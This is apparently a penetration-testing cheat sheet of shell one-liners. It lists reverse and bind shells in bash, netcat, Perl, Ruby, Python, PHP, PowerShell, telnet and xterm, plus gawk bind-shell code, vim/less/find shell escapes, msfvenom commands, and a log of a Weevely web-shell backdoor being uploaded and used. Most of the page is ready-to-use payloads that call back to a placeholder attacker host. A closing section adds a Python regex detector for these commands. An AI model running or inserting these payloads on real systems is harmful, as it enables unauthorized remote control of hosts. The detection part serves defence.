Shells

Reverse Shell Generator

Upgrading simple shells to fully interactive TTYs

msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'
msfvenom -p cmd/unix/reverse_netcat LHOST=[IPADDR] LPORT=[PORT]

Bash

TEE

echo "evil script code" | tee script.sh

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip

VIM

  1. Open vi or vim and type: :set shell=/bin/bash
  2. Next, type and execute :shell or :! /bin/bash

AWK

awk 'BEGIN {system("/bin/sh")}'

GAWK

#!/usr/bin/gawk -f
# Bind shell: listens on TCP port 8080 and runs each received line as a command
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

FIND

find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

MORE/LESS/MAN

After you use the ‘more’, ‘less’, or ‘man’ command with a file, type ‘!’ followed by a command. For instance, try the following once inside the file:

! /bin/sh
!/bin/sh
!bash

Reverse Shell

bash -i >& /dev/tcp/[IPADDR]/[PORT] 0>&1
0<&196;exec 196<>/dev/tcp/[IPADDR]/[PORT]; sh <&196 >&196 2>&196

Perl

Shell

perl -e 'exec "/bin/sh";'
exec "/bin/sh";

Reverse Shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows Only

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

Shell

exec "/bin/sh"

Reverse Shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("[IPADDR]",[PORT]).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows Only

ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat Reverse Shell

Linux:

nc -c /bin/sh [IPADDR] [PORT]
/bin/sh | nc [IPADDR] [PORT]
rm -f /tmp/p; mknod /tmp/p p && nc [IPADDR] [PORT] 0</tmp/p | /bin/sh 1>/tmp/p

Windows:

nc -nv 4444 -e cmd.exe
nc -nv {ip} {port} -e cmd.exe

Python

Shell

python -c 'import pty; pty.spawn("/bin/bash")'
exit_code = os.system('/bin/sh'); output = os.popen('/bin/sh').read()

Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IPADDR]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php $output = shell_exec('ls ../../'); echo "<pre>$output</pre>"; ?>

php-reverse-shell

Weevely3

root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py generate some_password /root/Desktop/backdoor.php
Generated backdoor with password 'some_password' in '/root/Desktop/backdoor.php' of 1332 byte size.
# upload the shell (somewhere accessible)
# access the URL where the backdoor is located (http://192.168.230.150:8081/images/shells/backdoor.php)
# then execute
root@k22:~/Downloads/post-exploitation/weevely3# ./weevely.py http://192.168.230.150:8081/images/shells/backdoor.php some_password
[+] weevely 3.2.0
[+] Target: 192.168.230.150:8081
[+] Session: /root/.weevely/sessions/192.168.230.150/backdoor_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> whoami
www-data

Reverse Shell

php -r '$sock=fsockopen("[IPADDR]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet [IPADDR] [PORT] 0</tmp/p | /bin/sh 1>/tmp/p
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

Java

Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Netcat

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc -c /bin/sh attackerip 4444
/bin/sh | nc attackerip 4444
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p

Powershell

Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
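From the detection side, the one-liners catalogued on this page share a handful of command-line signatures (`/dev/tcp/`, `nc -e`/`-c`, a fifo piped through `nc` or `telnet`, `pty.spawn`, `xterm -display <ip>:<n>`, `find -exec` launching a shell, and socket classes in Perl/Ruby/PHP/PowerShell). The following added example, not part of the original cheat sheet, runs a small rule set over constructed process-execution records; the PIDs, usernames, command lines and rule names are all made up for illustration.

```python
import re

# Constructed process-execution records (the shape an auditd/EDR feed might give);
# PIDs, users and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 101, "user": "www-data", "cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"},
    {"pid": 102, "user": "www-data", "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"pid": 103, "user": "alice", "cmdline": "nc -zv db.internal 5432"},
    {"pid": 104, "user": "www-data",
     "cmdline": "rm -f /tmp/p; mknod /tmp/p p && nc 10.0.0.1 4444 0</tmp/p | /bin/sh 1>/tmp/p"},
    {"pid": 105, "user": "bob", "cmdline": "xterm -display 10.0.0.1:1"},
    {"pid": 106, "user": "root", "cmdline": "find / -name core -exec rm {} \\;"},
    {"pid": 107, "user": "www-data",
     "cmdline": "find / -name blahblah -exec /bin/awk 'BEGIN {system(\"/bin/sh\")}' \\;"},
    {"pid": 108, "user": "svc", "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
                                           "$client = New-Object System.Net.Sockets.TCPClient(\"10.0.0.1\",4444)"},
    {"pid": 109, "user": "www-data", "cmdline": "nc -e /bin/sh 10.0.0.1 1234"},
]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# One rule per family of one-liners catalogued above (rule names are ours).
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/" + IPV4 + r"/\d+")),
    ("netcat_exec", re.compile(r"\bnc\b[^|;]*\s-[a-zA-Z]*[ce]\s")),  # nc -e / nc -c
    ("fifo_pipe_shell", re.compile(r"\b(?:mkfifo|mknod)\s+\S+.*\|\s*(?:nc|telnet)\b"
                                   r"|\b(?:nc|telnet)\b.*\|\s*/bin/(?:ba)?sh")),
    ("pty_spawn", re.compile(r"pty\.spawn\(")),
    ("xterm_remote_display", re.compile(r"\bxterm\b.*-display\s+" + IPV4 + r":\d+")),
    ("find_exec_shell", re.compile(r"\bfind\b.*-exec\s.*/bin/(?:ba)?sh")),
    ("script_socket_shell", re.compile(r"IO::Socket::INET|TCPSocket\.(?:new|open)|fsockopen\("
                                       r"|System\.Net\.Sockets\.TCPClient")),
]


def scan_events(events):
    """Return (pid, user, rule_name) for every rule that matches an event's command line."""
    findings = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append((ev["pid"], ev["user"], name))
    return findings


if __name__ == "__main__":
    for pid, user, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid={pid} user={user} rule={rule}")
```

The benign `nc -zv` port check and the `find -exec rm` cleanup job produce no findings, while each of the seven shell-style command lines is attributed to exactly one rule.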